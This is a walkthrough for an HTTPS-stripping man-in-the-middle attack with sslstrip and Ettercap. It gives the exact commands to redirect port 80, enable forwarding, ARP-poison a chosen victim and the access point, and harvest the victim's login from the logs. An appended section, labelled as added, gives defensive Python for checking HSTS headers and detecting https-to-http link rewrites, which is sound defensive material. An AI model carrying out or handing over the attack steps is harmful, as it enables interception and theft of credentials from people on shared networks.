SSL Strip
This tool provides a demonstration of the HTTPS stripping attack that was presented at Black Hat DC 2009. It transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, and then maps those links to either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon that looks like a lock icon, selective logging, and session denial.
In this article I will walk you through installing sslstrip together with Ettercap and performing a MITM attack.
1) Install Ettercap with its GTK front end
sudo apt-get install ettercap ettercap-gtk
2) Download sslstrip
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
3) Extract sslstrip
tar zxvf sslstrip-0.7.tar.gz
4) Redirect requests on port 80 (HTTP) to sslstrip running on port 10000
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
5) Verify the entry in the nat table
sudo iptables --list -t nat
6) Enable IP forwarding
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
(The form "sudo echo 1 > /proc/sys/net/ipv4/ip_forward" fails with "Permission denied", because sudo applies only to echo while the redirect is performed by your unprivileged shell.)
7) Check forwarding
cat /proc/sys/net/ipv4/ip_forward
The output should be 1.
8) Run sslstrip, listening on port 10000 and logging to sslstrip.log
sudo python sslstrip-0.7/sslstrip.py -w sslstrip.log -l 10000
9) Monitor the log
sudo tail -F sslstrip.log
10) Launch the Ettercap GUI with a packet dump to a pcap file
sudo ettercap -G -w ~/ettercap_packets.pcap
11) Enter Unified sniffing
Sniff -> Unified sniffing
12) Select your wireless interface (its name may differ from mine; check yours with 'ifconfig')
Network interface: wlan0
13) Scan for hosts
Hosts -> Scan for hosts
14) View hosts list from scan
Hosts -> Host list
15) Select targets
Highlight the victim -> Add to Target 1
Highlight the access point -> Add to Target 2
16) View added targets
Targets -> Current Targets
17) Perform ARP poisoning (the MITM attack) on the targets
Mitm -> Arp poisoning
You can test the stripping by browsing to a site that supports HTTPS; http://facebook.com is a good example.
After the victim logs in, you will see the output in sslstrip.log. Don't forget to go back with Wireshark and check whether you captured anything useful in ettercap_packets.pcap.
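Two defender-side checks against the downgrade this walkthrough demonstrates, as an added example that is not part of the original article or of sslstrip: parse_hsts evaluates the Strict-Transport-Security header, which is what stops a browser from following the rewritten http:// links, and downgraded_links diffs a page fetched over a trusted path against the copy a client behind the suspect gateway received, reporting the https-to-http rewrites. All function names, the example.com URLs and the HTML samples are constructed for the example.

```python
import re
from dataclasses import dataclass

@dataclass
class HstsResult:
    present: bool
    max_age: int
    include_subdomains: bool
    preload: bool
    @property
    def effective(self) -> bool:
        # max-age=0 tells the browser to forget the host, so it protects nothing.
        return self.present and self.max_age > 0

def parse_hsts(headers: dict) -> HstsResult:
    """Parse Strict-Transport-Security (RFC 6797); names are case-insensitive.
    Browsers honour it only over HTTPS, so a first visit over HTTP still needs preload."""
    value = None
    for name, v in headers.items():
        if name.lower() == "strict-transport-security":
            value = v
    if value is None:
        return HstsResult(False, 0, False, False)
    max_age, include_sub, preload = 0, False, False
    for directive in value.split(";"):
        d = directive.strip().lower()
        if d.startswith("max-age="):
            m = re.match(r'max-age="?(\d+)', d)
            max_age = int(m.group(1)) if m else 0
        elif d == "includesubdomains":
            include_sub = True
        elif d == "preload":
            preload = True
    return HstsResult(True, max_age, include_sub, preload)

# Absolute URLs in the attributes a stripper rewrites (href, action, src).
LINK_RE = re.compile(r"""(?:href|action|src)=["'](https?://[^"']+)""", re.I)

def downgraded_links(origin_html: str, received_html: str) -> list:
    """URLs the origin served as https:// that arrived at the client as http://."""
    origin = set(LINK_RE.findall(origin_html))
    received = set(LINK_RE.findall(received_html))
    return sorted(u for u in origin if u.startswith("https://") and "http://" + u[8:] in received)

# Constructed sample: the same page fetched over a trusted path (ORIGIN_HTML) and
# as a client behind the suspect gateway received it (RECEIVED_HTML).
ORIGIN_HTML = ('<a href="https://login.example.com/">Log in</a>'
               '<form action="https://login.example.com/auth"><img src="http://cdn.example.com/logo.png">')
RECEIVED_HTML = ORIGIN_HTML.replace("https://", "http://")
```

Running the same comparison from a canary client on the network turns the stripping into an alert instead of a surprise in a log.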
Enjoy!